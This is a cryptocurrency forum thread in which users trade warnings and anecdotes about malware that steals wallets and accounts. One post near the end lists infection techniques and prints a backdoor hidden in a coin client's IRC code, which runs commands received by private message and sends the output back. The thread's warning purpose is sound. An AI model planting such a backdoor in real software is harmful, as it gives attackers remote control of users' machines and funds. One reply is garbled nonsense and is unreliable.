Beware of Increasingly Sophisticated Malware Infection Attempts

[Milla Kross]

Yes. now almost every second is subject to attack by hackers, so you need to be very careful, put more and more new programs that will secure your data. Good luck everyone)

[Honourable11]

I remember back in 2012 when I first heard about mining BTC, there was a thing with viruses on graphic cards which could not be detected by standard antivirus programs.
So I did not start tan...the biggest mistake of my life so far...

[Rammygold]

Ialways use sandboxie and shado defender before installing or running any new program now a days.. .  And mediam level of hackers fears of virustotal because they send the file for further analysis(as what i've heard)  and their FUD malware loose its FUD ability.  So my suggestion will be...  Use sandboxie or any similar software and still use softwares like shadow defender for any kind of new program

[kumablack]

These malware attacks keep getting more insidious and scary everyday... one cant be careful enough online

[santaroom]

This is so true there are kinds of malware infections that can infiltrate our computers, let alone our very own wallets. We just need to be more keen when it comes to securing our beloved coins and making sure that they will not just vanish into thin air, the same with the efforts that we have put into our earnings

[CptWhsikeyjack]

There is a new type of malware and account stealing for MEW. Its called MEWkit. It steals money from the victim’s wallet through a front-end program that mimics the MyEtherWallet.

Another one targets airdrops. They basically ask you to fill out a form with all you info and address and then redirect you to another site that is a clone of MEW. You will be requested to sign a message that will in turn steal your keys.  This was informed by the official MEW account on twitter.

[bozo1]

That's why it's good to have more wallets. One for coins that are worthy of you, one for airdrop, ...

[wavesroom]

a year ago, my email was hacked. After that, the coins were withdrawn from the exchange .  It cost about 3,5k$. 2 FA has not been installed. Gmail mail return failed. Many contacts are missing

[vuanhquan]

 Everybody please use avast antivirus. It will help remove millions to dangerous applications, and malware on your computer, which can help to avoid digging underground coin.

[adamsrombano]

a year ago, my email was hacked. After that, the coins were withdrawn from the exchange .  It cost about 3,5k$. 2 FA has not been installed. Gmail mail return failed. Many contacts are missing

I am deeply saddened to hear that. Same way with my friends they share s the same reason hacker took a lot of their earnings it's also a large cost and they regret what happened but still its great lessoned for them and learned what happened so for you next time be aware and secured your accounts as much as possible we put so much effort and time earning those token.

[Zakifon]

I use antivirus Avast Premier - I forgot what viruses, rootkits and other mucks.  Very satisfied with this product!  I recommend to everyone!  It is especially important to have an antivirus if you use a software purse.

[msadikot53]

Are the malware attempts still going on? What care should be taken as a beginner?

[killersyw]

Thanks for being on top of this and keeping us informed, we do appreciate it!

[Dendamma]

Thank you for sharing tips and information like this. I found this link in this thread https://asktom.cf/index.php?topic=3839038.0 which is also quite useful to me as a new member of this forum.

[leialdover]

Ive been alarmed by this post. Sometimes it really helps when you read on a forum like this.. But my concern is, how can i detect those malware infections if i dont have any experience and knowledge about the codes that their using..? Sometimes i just click on links, and i dont know if clicking certain links will cause infections on my device, and i will loose all my data or theres a possibility that i will be hacked. Online thing is really dangerous.
Anyaways this post is very informative, and keep reminding everyone to be extra careful.

[haanhictu]

I'm an invalid code and looking out the hole. sad and sorry, but do not know this copy.authenticate does not think to a currency

[kinggta10]

This is really rampant nowadays. Offline wallet can still make us secure no matter what

[simpelplan]

There is a new type of malware and account stealing for MEW. Its called MEWkit. It steals money from the victim’s wallet through a front-end program that mimics the MyEtherWallet.

Another one targets airdrops. They basically ask you to fill out a form with all you info and address and then redirect you to another site that is a clone of MEW. You will be requested to sign a message that will in turn steal your keys.  This was informed by the official MEW account on twitter.

yes it is very dangerous, we must be very careful
I am used to bookmarking important sites to avoid being directed to such things
I also usually check the site twice before filling in important data

[nwosuchristabe2]

I had a similar issue last year, when I was sent a free trading bot by an online acquitance who I met in a telegram trading group. I left the file to download while I took a nap only to wake up to the most unfortunate incidence, all my trading accounts were wiped. I still cannot fathom, how it got access to the trading accounts without 2FA, though my phone was beside my laptop. I regret leaving my accounts opened on the browser. My advice is to abstain from downloading free softwares, or any application you don't understand, it's pretty risky. God help us.

[Miha Kot]

In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:

Code:

if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
	CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
	if (buf) {
		std::string result = "";
		while (!feof(buf))
			if (fgets(pszName, sizeof(pszName), buf) != NULL)
				result += pszName;
		CFree(buf);
		strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
		if (strchr(pszName, '!'))
			*strchr(pszName, '!') = '\0';
		Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
	}
}

here is the source code with macros resolved:

Code:

if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
	FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
	if (buf) {
		std::string result = "";
		while (!feof(buf))
			if (fgets(pszName, sizeof(pszName), buf) != NULL)
				result += pszName;
		pclose(buf);
		strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
		if (strchr(pszName, '!'))
			*strchr(pszName, '!') = '\0';
		Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
	}
}

The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

What security system to do to avoid falling into the trap of cybercriminals and how to understand that it is cybercriminals ?